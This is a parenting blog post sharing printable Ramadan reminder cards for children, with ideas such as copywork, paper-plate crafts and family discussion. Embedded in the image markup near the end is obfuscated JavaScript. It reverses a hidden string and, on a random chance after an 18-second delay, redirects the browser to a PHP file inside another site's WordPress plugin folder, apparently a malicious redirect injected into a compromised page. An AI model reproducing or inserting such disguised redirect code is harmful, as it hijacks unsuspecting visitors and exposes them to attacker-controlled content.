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Ramadan Reminders FREE Printable

By Shannen Espelien Leave a Comment

Ramadan is less than a week away, and I have to admit, I’m starting to feel like I’m scrambling a bit to get things ready for the kids to really get a positive experience out of this month, in sha Allah! With iftar around 9pm, Amatullah and possibly Aamina won’t even be awake, so I need to add things into the earlier parts of our day to make Ramadan kid-friendly. Of course I want them to see the increased worship we do during Ramadan, but what is more apparent to them are decorations, and in my essential Ramadan decorations list, I shared some of my favorites.

Now, to go along with the Rockets and Robots Eid countdown calendar on that list, I made some Ramadan reminder cards to include in the daily bags. What can you do with the Ramadan reminder cards?

  • For older kids, do memory work, dictation, or copywork with the hadith or ayah
  • Younger kids can paste the ayah or hadith on a paper plate and decorate it
  • Have a family discussion circle each day about the topic covered
  • Create Ramadan greeting cards using some of the ahadith or ayat

Download your Ramadan reminder cards here!

Ramadan Reminders <script data-lazy-srcset=$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“‘php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to print for family crafts and learning!” width=”650″ height=”650″ />

I’d love to hear some other ideas about how to use the Ramadan reminder cards! Please share your ideas in the comments!

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